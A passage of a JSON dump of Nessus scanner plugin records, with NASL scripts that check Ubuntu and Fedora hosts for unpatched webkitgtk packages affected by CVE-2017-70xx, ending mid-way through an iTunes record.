attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:11:35", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-07-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:webkitgtk4"], "id": "FEDORA_2017-73D6A0DFBB.NASL", "href": "https://www.tenable.com/plugins/nessus/102047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-73d6a0dfbb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102047);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n\n script_name(english:\"Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-73d6a0dfbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"webkitgtk4-2.16.6-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:12:28", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-11T00:00:00", "title": "Fedora 24 : webkitgtk4 (2017-9d572cc64a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-08-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-9D572CC64A.NASL", "href": "https://www.tenable.com/plugins/nessus/102398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9d572cc64a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102398);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n\n script_name(english:\"Fedora 24 : webkitgtk4 (2017-9d572cc64a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9d572cc64a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"webkitgtk4-2.16.6-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:30", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-28T00:00:00", "title": "Fedora 26 : webkitgtk4 (2017-24bddb96b5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-07-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-24BDDB96B5.NASL", "href": "https://www.tenable.com/plugins/nessus/102023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-24bddb96b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102023);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2017-24bddb96b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-24bddb96b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.16.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T03:32:52", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, 